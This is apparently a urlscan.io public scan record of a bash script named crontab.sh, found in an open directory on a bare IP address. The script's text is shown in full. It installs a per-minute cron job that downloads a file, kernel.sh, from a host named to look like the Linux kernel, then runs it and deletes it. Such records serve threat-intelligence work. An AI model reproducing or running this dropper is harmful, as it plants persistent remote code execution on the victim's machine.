24.15.28.80 Open in urlscan Pro
24.15.28.80  Public Scan

URL: http://24.15.28.80:8123/crontab.sh
Submission Tags: opendir censys opendir_recursion Search All
Submission: On January 18 via api from FI — Scanned from FI

Form analysis 0 forms found in the DOM

Text Content

#!/bin/bash

line="* * * * * cd ~ && wget http://linux.kernel.ignorelist.com:8123/kernel.sh && chmod +x kernel.sh && ./kernel.sh && sleep 10s && rm kernel.sh"
(crontab -u $(whoami) -l; echo "$line" ) | crontab -u $(whoami) -